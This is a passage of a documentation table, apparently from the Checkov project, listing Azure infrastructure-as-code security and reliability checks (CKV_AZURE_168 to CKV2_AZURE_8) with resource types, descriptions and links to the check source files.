resource | azurerm_container_registry | Ensure a retention policy is set to cleanup untagged manifests. | Terraform | [ACREnableRetentionPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACREnableRetentionPolicy.py) | -| 1924 | CKV_AZURE_168 | resource | azurerm_kubernetes_cluster | Ensure Azure Kubernetes Cluster (AKS) nodes should use a minimum number of 50 pods. | Terraform | [AKSMaxPodsMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSMaxPodsMinimum.py) | -| 1925 | CKV_AZURE_168 | resource | azurerm_kubernetes_cluster_node_pool | Ensure Azure Kubernetes Cluster (AKS) nodes should use a minimum number of 50 pods. | Terraform | [AKSMaxPodsMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSMaxPodsMinimum.py) | -| 1926 | CKV_AZURE_169 | resource | azurerm_kubernetes_cluster | Ensure Azure Kubernetes Cluster (AKS) nodes use scale sets | Terraform | [AKSPoolTypeIsScaleSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSPoolTypeIsScaleSet.py) | -| 1927 | CKV_AZURE_170 | resource | azurerm_kubernetes_cluster | Ensure that AKS use the Paid Sku for its SLA | Terraform | [AKSIsPaidSku.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSIsPaidSku.py) | -| 1928 | CKV_AZURE_171 | resource | azurerm_kubernetes_cluster | Ensure AKS cluster upgrade channel is chosen | Terraform | [AKSUpgradeChannel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSUpgradeChannel.py) | -| 1929 | CKV_AZURE_172 | resource | azurerm_kubernetes_cluster | Ensure autorotation of Secrets Store CSI Driver secrets for AKS clusters | Terraform | [AKSSecretStoreRotation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSSecretStoreRotation.py) | -| 1930 | CKV_AZURE_173 | resource | azurerm_api_management | Ensure API management uses at least TLS 1.2 | Terraform | [APIManagementMinTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIManagementMinTLS12.py) | -| 1931 | CKV_AZURE_174 | resource | azurerm_api_management | Ensure API management public access is disabled | Terraform | [APIManagementPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIManagementPublicAccess.py) | -| 1932 | CKV_AZURE_175 | resource | azurerm_web_pubsub | Ensure Web PubSub uses a SKU with an SLA | Terraform | [PubsubSKUSLA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PubsubSKUSLA.py) | -| 1933 | CKV_AZURE_176 | resource | azurerm_web_pubsub | Ensure Web PubSub uses managed identities to access Azure resources | Terraform | [PubsubSpecifyIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PubsubSpecifyIdentity.py) | -| 1934 | CKV_AZURE_177 | resource | azurerm_windows_virtual_machine | Ensure Windows VM enables automatic updates | Terraform | [WinVMAutomaticUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/WinVMAutomaticUpdates.py) | -| 1935 | CKV_AZURE_177 | resource | azurerm_windows_virtual_machine_scale_set | Ensure Windows VM enables automatic updates | Terraform | [WinVMAutomaticUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/WinVMAutomaticUpdates.py) | -| 1936 | CKV_AZURE_178 | resource | azurerm_linux_virtual_machine | Ensure linux VM enables SSH with keys for secure communication | Terraform | [LinuxVMUsesSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/LinuxVMUsesSSH.py) | -| 1937 | CKV_AZURE_178 | resource | azurerm_linux_virtual_machine_scale_set | Ensure linux VM enables SSH with keys for secure communication | Terraform | [LinuxVMUsesSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/LinuxVMUsesSSH.py) | -| 1938 | CKV_AZURE_179 | resource | azurerm_linux_virtual_machine | Ensure VM agent is installed | Terraform | [VMAgentIsInstalled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMAgentIsInstalled.py) | -| 1939 | CKV_AZURE_179 | resource | azurerm_linux_virtual_machine_scale_set | Ensure VM agent is installed | Terraform | [VMAgentIsInstalled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMAgentIsInstalled.py) | -| 1940 | CKV_AZURE_179 | resource | azurerm_windows_virtual_machine | Ensure VM agent is installed | Terraform | [VMAgentIsInstalled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMAgentIsInstalled.py) | -| 1941 | CKV_AZURE_179 | resource | azurerm_windows_virtual_machine_scale_set | Ensure VM agent is installed | Terraform | [VMAgentIsInstalled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMAgentIsInstalled.py) | -| 1942 | CKV_AZURE_180 | resource | azurerm_kusto_cluster | Ensure that data explorer uses Sku with an SLA | Terraform | [DataExplorerSKUHasSLA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataExplorerSKUHasSLA.py) | -| 1943 | CKV_AZURE_181 | resource | azurerm_kusto_cluster | Ensure that data explorer/Kusto uses managed identities to access Azure resources securely. | Terraform | [DataExplorerServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataExplorerServiceIdentity.py) | -| 1944 | CKV_AZURE_182 | resource | azurerm_virtual_network | Ensure that VNET has at least 2 connected DNS Endpoints | Terraform | [VnetSingleDNSServer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VnetSingleDNSServer.py) | -| 1945 | CKV_AZURE_182 | resource | azurerm_virtual_network_dns_servers | Ensure that VNET has at least 2 connected DNS Endpoints | Terraform | [VnetSingleDNSServer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VnetSingleDNSServer.py) | -| 1946 | CKV_AZURE_183 | resource | azurerm_virtual_network | Ensure that VNET uses local DNS addresses | Terraform | [VnetLocalDNS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VnetLocalDNS.py) | -| 1947 | CKV_AZURE_184 | resource | azurerm_app_configuration | Ensure 'local_auth_enabled' is set to 'False' | Terraform | [AppConfigLocalAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigLocalAuth.py) | -| 1948 | CKV_AZURE_185 | resource | azurerm_app_configuration | Ensure 'Public Access' is not Enabled for App configuration | Terraform | [AppConfigPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigPublicAccess.py) | -| 1949 | CKV_AZURE_186 | resource | azurerm_app_configuration | Ensure App configuration encryption block is set. | Terraform | [AppConfigEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigEncryption.py) | -| 1950 | CKV_AZURE_187 | resource | azurerm_app_configuration | Ensure App configuration purge protection is enabled | Terraform | [AppConfigPurgeProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigPurgeProtection.py) | -| 1951 | CKV_AZURE_188 | resource | azurerm_app_configuration | Ensure App configuration Sku is standard | Terraform | [AppConfigSku.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigSku.py) | -| 1952 | CKV_AZURE_189 | resource | azurerm_key_vault | Ensure that Azure Key Vault disables public network access | Terraform | [KeyVaultDisablesPublicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyVaultDisablesPublicNetworkAccess.py) | -| 1953 | CKV_AZURE_190 | resource | azurerm_storage_account | Ensure that Storage blobs restrict public access | Terraform | [StorageBlobRestrictPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageBlobRestrictPublicAccess.py) | -| 1954 | CKV_AZURE_191 | resource | azurerm_eventgrid_topic | Ensure that Managed identity provider is enabled for Azure Event Grid Topic | Terraform | [EventgridTopicIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridTopicIdentityProviderEnabled.py) | -| 1955 | CKV_AZURE_192 | resource | azurerm_eventgrid_topic | Ensure that Azure Event Grid Topic local Authentication is disabled | Terraform | [EventgridTopicLocalAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridTopicLocalAuthentication.py) | -| 1956 | CKV_AZURE_193 | resource | azurerm_eventgrid_topic | Ensure public network access is disabled for Azure Event Grid Topic | Terraform | [EventgridTopicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridTopicNetworkAccess.py) | -| 1957 | CKV_AZURE_194 | resource | azurerm_eventgrid_domain | Ensure that Managed identity provider is enabled for Azure Event Grid Domain | Terraform | [EventgridDomainIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridDomainIdentityProviderEnabled.py) | -| 1958 | CKV_AZURE_195 | resource | azurerm_eventgrid_domain | Ensure that Azure Event Grid Domain local Authentication is disabled | Terraform | [EventgridDomainLocalAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridDomainLocalAuthentication.py) | -| 1959 | CKV_AZURE_196 | resource | azurerm_signalr_service | Ensure that SignalR uses a Paid Sku for its SLA | Terraform | [SignalRSKUSLA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SignalRSKUSLA.py) | -| 1960 | CKV_AZURE_197 | resource | azurerm_cdn_endpoint | Ensure the Azure CDN disables the HTTP endpoint | Terraform | [CDNDisableHttpEndpoints.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CDNDisableHttpEndpoints.py) | -| 1961 | CKV_AZURE_198 | resource | azurerm_cdn_endpoint | Ensure the Azure CDN enables the HTTPS endpoint | Terraform | [CDNEnableHttpsEndpoints.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CDNEnableHttpsEndpoints.py) | -| 1962 | CKV_AZURE_199 | resource | azurerm_servicebus_namespace | Ensure that Azure Service Bus uses double encryption | Terraform | [AzureServicebusDoubleEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusDoubleEncryptionEnabled.py) | -| 1963 | CKV_AZURE_200 | resource | azurerm_cdn_endpoint_custom_domain | Ensure the Azure CDN endpoint is using the latest version of TLS encryption | Terraform | [CDNTLSProtocol12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CDNTLSProtocol12.py) | -| 1964 | CKV_AZURE_201 | resource | azurerm_servicebus_namespace | Ensure that Azure Service Bus uses a customer-managed key to encrypt data | Terraform | [AzureServicebusHasCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusHasCMK.py) | -| 1965 | CKV_AZURE_202 | resource | azurerm_servicebus_namespace | Ensure that Managed identity provider is enabled for Azure Service Bus | Terraform | [AzureServicebusIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusIdentityProviderEnabled.py) | -| 1966 | CKV_AZURE_203 | resource | azurerm_servicebus_namespace | Ensure Azure Service Bus Local Authentication is disabled | Terraform | [AzureServicebusLocalAuthDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusLocalAuthDisabled.py) | -| 1967 | CKV_AZURE_204 | resource | azurerm_servicebus_namespace | Ensure 'public network access enabled' is set to 'False' for Azure Service Bus | Terraform | [AzureServicebusPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusPublicAccessDisabled.py) | -| 1968 | CKV_AZURE_205 | resource | azurerm_servicebus_namespace | Ensure Azure Service Bus is using the latest version of TLS encryption | Terraform | [AzureServicebusMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusMinTLSVersion.py) | -| 1969 | CKV_AZURE_206 | resource | azurerm_storage_account | Ensure that Storage Accounts use replication | Terraform | [StorageAccountsUseReplication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountsUseReplication.py) | -| 1970 | CKV_AZURE_207 | resource | azurerm_search_service | Ensure Azure Cognitive Search service uses managed identities to access Azure resources | Terraform | [AzureSearchManagedIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchManagedIdentity.py) | -| 1971 | CKV_AZURE_208 | resource | azurerm_search_service | Ensure that Azure Cognitive Search maintains SLA for index updates | Terraform | [AzureSearchSLAIndex.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchSLAIndex.py) | -| 1972 | CKV_AZURE_209 | resource | azurerm_search_service | Ensure that Azure Cognitive Search maintains SLA for search index queries | Terraform | [AzureSearchSLAQueryUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchSLAQueryUpdates.py) | -| 1973 | CKV_AZURE_210 | resource | azurerm_search_service | Ensure Azure Cognitive Search service allowed IPS does not give public Access | Terraform | [AzureSearchAllowedIPsNotGlobal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchAllowedIPsNotGlobal.py) | -| 1974 | CKV_AZURE_211 | resource | azurerm_service_plan | Ensure App Service plan suitable for production use | Terraform | [AppServiceSkuMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSkuMinimum.py) | -| 1975 | CKV_AZURE_212 | resource | azurerm_service_plan | Ensure App Service has a minimum number of instances for failover | Terraform | [AppServiceInstanceMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceInstanceMinimum.py) | -| 1976 | CKV_AZURE_213 | resource | azurerm_app_service | Ensure that App Service configures health check | Terraform | [AppServiceSetHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSetHealthCheck.py) | -| 1977 | CKV_AZURE_213 | resource | azurerm_linux_web_app | Ensure that App Service configures health check | Terraform | [AppServiceSetHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSetHealthCheck.py) | -| 1978 | CKV_AZURE_213 | resource | azurerm_windows_web_app | Ensure that App Service configures health check | Terraform | [AppServiceSetHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSetHealthCheck.py) | -| 1979 | CKV_AZURE_214 | resource | azurerm_linux_web_app | Ensure App Service is set to be always on | Terraform | [AppServiceAlwaysOn.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAlwaysOn.py) | -| 1980 | CKV_AZURE_214 | resource | azurerm_windows_web_app | Ensure App Service is set to be always on | Terraform | [AppServiceAlwaysOn.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAlwaysOn.py) | -| 1981 | CKV_AZURE_215 | resource | azurerm_api_management_backend | Ensure API management backend uses https | Terraform | [APIManagementBackendHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIManagementBackendHTTPS.py) | -| 1982 | CKV_AZURE_216 | resource | Microsoft.Network/azureFirewalls | Ensure DenyIntelMode is set to Deny for Azure Firewalls | arm | [AzureFirewallDenyThreatIntelMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureFirewallDenyThreatIntelMode.py) | -| 1983 | CKV_AZURE_216 | resource | Microsoft.Network/azureFirewalls | Ensure DenyIntelMode is set to Deny for Azure Firewalls | Bicep | [AzureFirewallDenyThreatIntelMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureFirewallDenyThreatIntelMode.py) | -| 1984 | CKV_AZURE_216 | resource | azurerm_firewall | Ensure DenyIntelMode is set to Deny for Azure Firewalls | Terraform | [AzureFirewallDenyThreatIntelMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureFirewallDenyThreatIntelMode.py) | -| 1985 | CKV_AZURE_217 | resource | azurerm_application_gateway | Ensure Azure Application gateways listener that allow connection requests over HTTP | Terraform | [AppGWUsesHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppGWUsesHttps.py) | -| 1986 | CKV_AZURE_218 | resource | azurerm_application_gateway | Ensure Application Gateway defines secure protocols for in transit communication | Terraform | [AppGWDefinesSecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppGWDefinesSecureProtocols.py) | -| 1987 | CKV_AZURE_219 | resource | azurerm_firewall | Ensure Firewall defines a firewall policy | Terraform | [AzureFirewallDefinesPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureFirewallDefinesPolicy.py) | -| 1988 | CKV_AZURE_220 | resource | azurerm_firewall_policy | Ensure Firewall policy has IDPS mode as deny | Terraform | [AzureFirewallPolicyIDPSDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureFirewallPolicyIDPSDeny.py) | -| 1989 | CKV_AZURE_221 | resource | azurerm_linux_function_app | Ensure that Azure Function App public network access is disabled | Terraform | [FunctionAppPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppPublicAccessDisabled.py) | -| 1990 | CKV_AZURE_221 | resource | azurerm_linux_function_app_slot | Ensure that Azure Function App public network access is disabled | Terraform | [FunctionAppPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppPublicAccessDisabled.py) | -| 1991 | CKV_AZURE_221 | resource | azurerm_windows_function_app | Ensure that Azure Function App public network access is disabled | Terraform | [FunctionAppPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppPublicAccessDisabled.py) | -| 1992 | CKV_AZURE_221 | resource | azurerm_windows_function_app_slot | Ensure that Azure Function App public network access is disabled | Terraform | [FunctionAppPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppPublicAccessDisabled.py) | -| 1993 | CKV_AZURE_222 | resource | azurerm_linux_web_app | Ensure that Azure Web App public network access is disabled | Terraform | [AppServicePublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePublicAccessDisabled.py) | -| 1994 | CKV_AZURE_222 | resource | azurerm_windows_web_app | Ensure that Azure Web App public network access is disabled | Terraform | [AppServicePublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePublicAccessDisabled.py) | -| 1995 | CKV_AZURE_223 | resource | azurerm_eventhub_namespace | Ensure Event Hub Namespace uses at least TLS 1.2 | Terraform | [EventHubNamespaceMinTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventHubNamespaceMinTLS12.py) | -| 1996 | CKV_AZURE_224 | resource | azurerm_mssql_database | Ensure that the Ledger feature is enabled on database that requires cryptographic proof and nonrepudiation of data integrity | Terraform | [SQLDatabaseLedgerEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLDatabaseLedgerEnabled.py) | -| 1997 | CKV_AZURE_225 | resource | azurerm_service_plan | Ensure the App Service Plan is zone redundant | Terraform | [AppServicePlanZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePlanZoneRedundant.py) | -| 1998 | CKV_AZURE_226 | resource | azurerm_kubernetes_cluster | Ensure ephemeral disks are used for OS disks | Terraform | [AKSEphemeralOSDisks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSEphemeralOSDisks.py) | -| 1999 | CKV_AZURE_227 | resource | azurerm_kubernetes_cluster | Ensure that the AKS cluster encrypt temp disks, caches, and data flows between Compute and Storage resources | Terraform | [AKSEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSEncryptionAtHostEnabled.py) | -| 2000 | CKV_AZURE_227 | resource | azurerm_kubernetes_cluster_node_pool | Ensure that the AKS cluster encrypt temp disks, caches, and data flows between Compute and Storage resources | Terraform | [AKSEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSEncryptionAtHostEnabled.py) | -| 2001 | CKV_AZURE_228 | resource | azurerm_eventhub_namespace | Ensure the Azure Event Hub Namespace is zone redundant | Terraform | [EventHubNamespaceZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventHubNamespaceZoneRedundant.py) | -| 2002 | CKV_AZURE_229 | resource | azurerm_mssql_database | Ensure the Azure SQL Database Namespace is zone redundant | Terraform | [SQLDatabaseZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLDatabaseZoneRedundant.py) | -| 2003 | CKV_AZURE_230 | resource | azurerm_redis_cache | Standard Replication should be enabled | Terraform | [RedisCacheStandardReplicationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/RedisCacheStandardReplicationEnabled.py) | -| 2004 | CKV_AZURE_231 | resource | azurerm_app_service_environment_v3 | Ensure App Service Environment is zone redundant | Terraform | [AppServiceEnvironmentZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceEnvironmentZoneRedundant.py) | -| 2005 | CKV_AZURE_232 | resource | azurerm_kubernetes_cluster | Ensure that only critical system pods run on system nodes | Terraform | [AKSOnlyCriticalPodsOnSystemNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSOnlyCriticalPodsOnSystemNodes.py) | -| 2006 | CKV_AZURE_233 | resource | azurerm_container_registry | Ensure Azure Container Registry (ACR) is zone redundant | Terraform | [ACREnableZoneRedundancy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACREnableZoneRedundancy.py) | -| 2007 | CKV_AZURE_234 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender for cloud is set to On for Resource Manager | Terraform | [AzureDefenderDisabledForResManager.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderDisabledForResManager.py) | -| 2008 | CKV_AZURE_235 | resource | azurerm_container_group | Ensure that Azure container environment variables are configured with secure values only | Terraform | [AzureContainerInstanceEnvVarSecureValueType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureContainerInstanceEnvVarSecureValueType.py) | -| 2009 | CKV_AZURE_237 | resource | azurerm_container_registry | Ensure dedicated data endpoints are enabled. | Terraform | [ACRDedicatedDataEndpointEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRDedicatedDataEndpointEnabled.py) | -| 2010 | CKV2_AZURE_1 | resource | azurerm_storage_account | Ensure storage for critical data are encrypted with Customer Managed Key | Terraform | [StorageCriticalDataEncryptedCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageCriticalDataEncryptedCMK.yaml) | -| 2011 | CKV2_AZURE_2 | resource | azurerm_mssql_server_security_alert_policy | Ensure that Vulnerability Assessment (VA) is enabled on a SQL server by setting a Storage Account | Terraform | [VAisEnabledInStorageAccount.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAisEnabledInStorageAccount.yaml) | -| 2012 | CKV2_AZURE_2 | resource | azurerm_sql_server | Ensure that Vulnerability Assessment (VA) is enabled on a SQL server by setting a Storage Account | Terraform | [VAisEnabledInStorageAccount.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAisEnabledInStorageAccount.yaml) | -| 2013 | CKV2_AZURE_3 | resource | azurerm_mssql_server | Ensure that VA setting Periodic Recurring Scans is enabled on a SQL server | Terraform | [VAsetPeriodicScansOnSQL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAsetPeriodicScansOnSQL.yaml) | -| 2014 | CKV2_AZURE_3 | resource | azurerm_mssql_server_security_alert_policy | Ensure that VA setting Periodic Recurring Scans is enabled on a SQL server | Terraform | [VAsetPeriodicScansOnSQL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAsetPeriodicScansOnSQL.yaml) | -| 2015 | CKV2_AZURE_3 | resource | azurerm_mssql_server_vulnerability_assessment | Ensure that VA setting Periodic Recurring Scans is enabled on a SQL server | Terraform | [VAsetPeriodicScansOnSQL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAsetPeriodicScansOnSQL.yaml) | -| 2016 | CKV2_AZURE_3 | resource | azurerm_sql_server | Ensure that VA setting Periodic Recurring Scans is enabled on a SQL server | Terraform | [VAsetPeriodicScansOnSQL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAsetPeriodicScansOnSQL.yaml) | -| 2017 | CKV2_AZURE_4 | resource | azurerm_mssql_server | Ensure Azure SQL server ADS VA Send scan reports to is configured | Terraform | [VAconfiguredToSendReports.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReports.yaml) | -| 2018 | CKV2_AZURE_4 | resource | azurerm_mssql_server_security_alert_policy | Ensure Azure SQL server ADS VA Send scan reports to is configured | Terraform | [VAconfiguredToSendReports.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReports.yaml) | -| 2019 | CKV2_AZURE_4 | resource | azurerm_mssql_server_vulnerability_assessment | Ensure Azure SQL server ADS VA Send scan reports to is configured | Terraform | [VAconfiguredToSendReports.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReports.yaml) | -| 2020 | CKV2_AZURE_4 | resource | azurerm_sql_server | Ensure Azure SQL server ADS VA Send scan reports to is configured | Terraform | [VAconfiguredToSendReports.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReports.yaml) | -| 2021 | CKV2_AZURE_5 | resource | azurerm_mssql_server | Ensure that VA setting 'Also send email notifications to admins and subscription owners' is set for a SQL server | Terraform | [VAconfiguredToSendReportsToAdmins.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReportsToAdmins.yaml) | -| 2022 | CKV2_AZURE_5 | resource | azurerm_mssql_server_security_alert_policy | Ensure that VA setting 'Also send email notifications to admins and subscription owners' is set for a SQL server | Terraform | [VAconfiguredToSendReportsToAdmins.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReportsToAdmins.yaml) | -| 2023 | CKV2_AZURE_5 | resource | azurerm_mssql_server_vulnerability_assessment | Ensure that VA setting 'Also send email notifications to admins and subscription owners' is set for a SQL server | Terraform | [VAconfiguredToSendReportsToAdmins.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReportsToAdmins.yaml) | -| 2024 | CKV2_AZURE_5 | resource | azurerm_sql_server | Ensure that VA setting 'Also send email notifications to admins and subscription owners' is set for a SQL server | Terraform | [VAconfiguredToSendReportsToAdmins.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReportsToAdmins.yaml) | -| 2025 | CKV2_AZURE_6 | resource | azurerm_sql_firewall_rule | Ensure 'Allow access to Azure services' for PostgreSQL Database Server is disabled | Terraform | [AccessToPostgreSQLFromAzureServicesIsDisabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AccessToPostgreSQLFromAzureServicesIsDisabled.yaml) | -| 2026 | CKV2_AZURE_6 | resource | azurerm_sql_server | Ensure 'Allow access to Azure services' for PostgreSQL Database Server is disabled | Terraform | [AccessToPostgreSQLFromAzureServicesIsDisabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AccessToPostgreSQLFromAzureServicesIsDisabled.yaml) | -| 2027 | CKV2_AZURE_7 | resource | azurerm_sql_server | Ensure that Azure Active Directory Admin is configured | Terraform | [AzureActiveDirectoryAdminIsConfigured.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureActiveDirectoryAdminIsConfigured.yaml) | -| 2028 | CKV2_AZURE_8 | resource | azurerm_monitor_activity_log_alert | Ensure the storage container storing the activity logs 